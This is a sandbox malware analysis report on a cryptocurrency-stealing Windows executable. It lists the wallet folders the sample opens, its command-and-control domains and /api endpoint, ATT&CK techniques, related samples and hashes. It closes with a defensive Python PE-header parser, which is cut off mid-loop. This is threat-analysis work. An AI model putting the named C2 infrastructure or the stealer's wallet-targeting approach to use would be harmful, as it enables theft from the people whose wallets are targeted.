Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: Yara match | File source: 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2100238097.0000000001484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: P0SJULJxI0.exe PID: 5272, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: P0SJULJxI0.exe PID: 5272, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix (techniques listed per tactic; where the report gives a count of matched signatures for a technique, it is in parentheses):

• Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
• Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
• Execution: Windows Management Instrumentation (12), PowerShell (1), At, Cron, Launchd, Scheduled Task, Systemd Timers
• Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
• Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
• Defense Evasion: Virtualization/Sandbox Evasion (44), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1), Compile After Delivery
• Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
• Discovery: Query Registry (1), Security Software Discovery (851), Virtualization/Sandbox Evasion (44), Process Discovery (2), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (223)
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
• Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
• Command and Control: Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
• Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Service Stop, Inhibit System Recovery

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1580880 | Sample: P0SJULJxI0.exe | Startdate: 26/12/2024 | Architecture: WINDOWS | Score: 100

• Signatures on the start node: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 9 other signatures
• DNS/IP info on the start node: mindhandru.buzz
• Process started: P0SJULJxI0.exe
• DNS/IP info for P0SJULJxI0.exe: mindhandru.buzz, 172.67.165.185, 443, 49704, 49705, CLOUDFLARENETUS, United States
• Signatures on P0SJULJxI0.exe: Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); 10 other signatures

Antivirus detection for the submitted sample (Source | Detection | Scanner | Label):

• P0SJULJxI0.exe | 53% | Virustotal
• P0SJULJxI0.exe | 61% | ReversingLabs | Win32.Infostealer.Tinba
• P0SJULJxI0.exe | 100% | Avira | TR/Crypt.TPM.Gen
• P0SJULJxI0.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Antivirus detection for URLs (Source | Detection | Scanner | Label):

• https://mindhandru.buzz/c) | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/ste | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/MPh | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz:443/api | 100% | Avira URL Cloud | malware
• https://mindhandru.buzz/pi | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/apiX/ | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/pid | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/s | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/W/ | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/d | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/;.C | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/api; | 100% | Avira URL Cloud | malware
• https://mindhandru.buzz/apis | 0% | Avira URL Cloud | safe
• https://mindhandru.buzz/apih& | 0% | Avira URL Cloud | safe


Contacted domains (Name | IP | Active | Malicious | Reputation):

• mindhandru.buzz | 172.67.165.185 | true | false | high
Domains and URLs found in memory (Name | Malicious | Reputation):

• scentniej.buzz | false | high
• hummskitnj.buzz | false | high
• mindhandru.buzz | false | high
• https://mindhandru.buzz/api | false | high
• rebuildeso.buzz | false | high
• appliacnesot.buzz | false | high
• screwamusresz.buzz | false | high
• cashfuzysao.buzz | false | high
• inherineau.buzz | false | high
• prisonyfork.buzz | false | high
URLs found in memory (Name | Source | Malicious | Antivirus Detection | Reputation):

• https://duckduckgo.com/chrome_newtab | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://duckduckgo.com/ac/?q= | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/MPh | P0SJULJxI0.exe, 00000000.00000003.2482482732.0000000005C21000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://mindhandru.buzz/ste | P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi | P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/pi | P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://mindhandru.buzz:443/api | P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
• https://mindhandru.buzz/pid | P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• http://x1.c.lencr.org/0 | P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | false | high
• http://x1.i.lencr.org/0 | P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://support.mozilla.org/products/firefoxgro.all | P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://www.google.com/images/branding/product/ico/googleg_lodp.ico | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/c) | P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://mindhandru.buzz/s | P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://mindhandru.buzz/ | P0SJULJxI0.exe, 00000000.00000003.1625381463.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | false | high
• https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• http://crl.rootca1.amazontrust.com/rootca1.crl0 | P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/apiX/ | P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001462000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://mindhandru.buzz/W/ | P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001462000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• http://ocsp.rootca1.amazontrust.com0: | P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993. | P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://www.ecosia.org/newtab/ | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/d | P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44 | P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/apis | P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://ac.ecosia.org/autocomplete?q= | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/;.C | P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://mindhandru.buzz/api; | P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
• http://crl.micro | P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2505924911.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2480422715.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504533106.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | false | high
• https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• http://crt.rootca1.amazontrust.com/rootca1.cer0? | P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta | P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | high
• https://mindhandru.buzz/apih& | P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001462000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.165.185 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1580880
                                                                                        Start date and time:2024-12-26 12:48:07 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 53s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:P0SJULJxI0.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:e5d4e86f709d076fa5bd3e10007f487f.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 5
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target P0SJULJxI0.exe, PID 5272 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:49:23 | API Interceptor | 2389752x Sleep call for process: P0SJULJxI0.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.165.185 | r06aMlvVyM.exe | malicious | LummaC
172.67.165.185 | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
172.67.165.185 | XM6cn2uNux.exe | malicious | LummaC
172.67.165.185 | rwFNJ4pHWG.exe | malicious | LummaC
172.67.165.185 | dEugughckk.exe | malicious | LummaC
172.67.165.185 | Solara-v3.0.exe | malicious | LummaC
172.67.165.185 | https://click.jipolismall.de/i86/ | malicious | Unknown
172.67.165.185 | https://ser.optimalesi.de/i87/ | malicious | Unknown
172.67.165.185 | https://ser.optimalesi.de/i68 | malicious | Unknown
172.67.165.185 | https://cpanel.vivatell.de/i105/ | malicious | Unknown

Match | Associated Sample Name / URL | Detection | Threat Name | Context
mindhandru.buzz | r06aMlvVyM.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | XM6cn2uNux.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | ZX2M0AXZ56.exe | malicious | LummaC | 104.21.11.101
mindhandru.buzz | 0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
mindhandru.buzz | TTsfmr1RWm.exe | malicious | LummaC | 104.21.11.101
mindhandru.buzz | COBYmpzi7q.exe | malicious | LummaC | 104.21.11.101
mindhandru.buzz | rwFNJ4pHWG.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | lBsKTx65QC.exe | malicious | LummaC | 104.21.11.101
mindhandru.buzz | dEugughckk.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | Solara-v3.0.exe | malicious | LummaC | 172.67.165.185

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | C8QT9HkXEb.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | r06aMlvVyM.exe | malicious | LummaC | 172.67.165.185
CLOUDFLARENETUS | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar | 172.67.150.49
CLOUDFLARENETUS | XM6cn2uNux.exe | malicious | LummaC | 172.67.165.185
CLOUDFLARENETUS | 0hRSICdcGg.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | ZX2M0AXZ56.exe | malicious | LummaC | 104.21.11.101
CLOUDFLARENETUS | 6GNqkkKY0j.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | 0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
CLOUDFLARENETUS | TTsfmr1RWm.exe | malicious | LummaC | 104.21.11.101
CLOUDFLARENETUS | COBYmpzi7q.exe | malicious | LummaC | 104.21.11.101

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | C8QT9HkXEb.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | r06aMlvVyM.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | XM6cn2uNux.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | 0hRSICdcGg.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | ZX2M0AXZ56.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | 6GNqkkKY0j.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | 0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | TTsfmr1RWm.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | COBYmpzi7q.exe | malicious | LummaC | 172.67.165.185
a0e9f5d64349fb13191bc781f81f42e1 | rwFNJ4pHWG.exe | malicious | LummaC | 172.67.165.185
                                                                                                            No context
                                                                                                            No created / dropped files found
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.575682278114643
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:P0SJULJxI0.exe
                                                                                                            File size:2'954'240 bytes
                                                                                                            MD5:e5d4e86f709d076fa5bd3e10007f487f
                                                                                                            SHA1:a3b62c9255ed1c479cc5a01110d33d59f50bc383
                                                                                                            SHA256:774d9d60d5ef51a4ce1780aae20047a0cd00c45f25abd0cbba77028c5b752cf4
                                                                                                            SHA512:e83fecb0b657c5928656f00e55467c4e827f7229734feb87b0d77a00fc59228192f4bf0aa7a8432f56c7756ab66434a40f3c5d8831c523270d04710c4a47d98b
                                                                                                            SSDEEP:49152:z10K87R2Eaf+rjvTl+QgMUQ61X59lH8rPoD3M29Y4MJ0Ata:p0KY4Eaf+rrTMQ3UVX5/HSSMpa
                                                                                                            TLSH:FCD55B51A90572CFD8CE26788427CD426C1D03F8DB184ACB9CAC7C7ABDA7DC211B6E65
                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@...........................0...........@.................................Y@..m..
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x6fe000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
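The header fields above are worth recomputing before trusting any report: an entrypoint of 0x6fe000 that resolves into a trailing section named .taggant rather than .text, a COFF timestamp of 0x67695986, and a whole-file entropy of about 6.58 bits per byte. The following is an added example, not code from the Joe Sandbox report or from Joe Security. It is a standard-library Python parser that walks the DOS, COFF, optional and section headers, maps the entrypoint RVA to its section, decodes the timestamp to UTC, computes per-section Shannon entropy and raises the cheap header-level packer indicators. It reads nothing from disk: build_demo_pe() constructs a minimal PE32 image in memory whose entrypoint, image base, timestamp and entry section name are set to the values the report shows, while the section layout and byte contents (two sections, .text and .taggant, with invented bodies) are assumptions for the demo. To run it against a real file, replace build_demo_pe() with open(path, "rb").read().

```python
"""Static PE header triage: entrypoint section, COFF timestamp, per-section entropy.
Added example, not part of the Joe Sandbox report; the image parsed here is constructed
in memory by build_demo_pe() and only its header values mirror the report."""
import math
import struct
from datetime import datetime, timezone

# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_FMT = "<HHIIIHH"
# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF -> optional header -> section table (PE32 or PE32+)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, image, coff_off)
    opt_off = coff_off + struct.calcsize(COFF_FMT)
    magic = struct.unpack_from("<H", image, opt_off)[0]
    entry_rva = struct.unpack_from("<I", image, opt_off + 16)[0]   # AddressOfEntryPoint
    if magic == 0x10B:                                            # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", image, opt_off + 28)[0]
    elif magic == 0x20B:                                          # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", image, opt_off + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    sections = []
    table_off = opt_off + opt_size
    for i in range(nsections):
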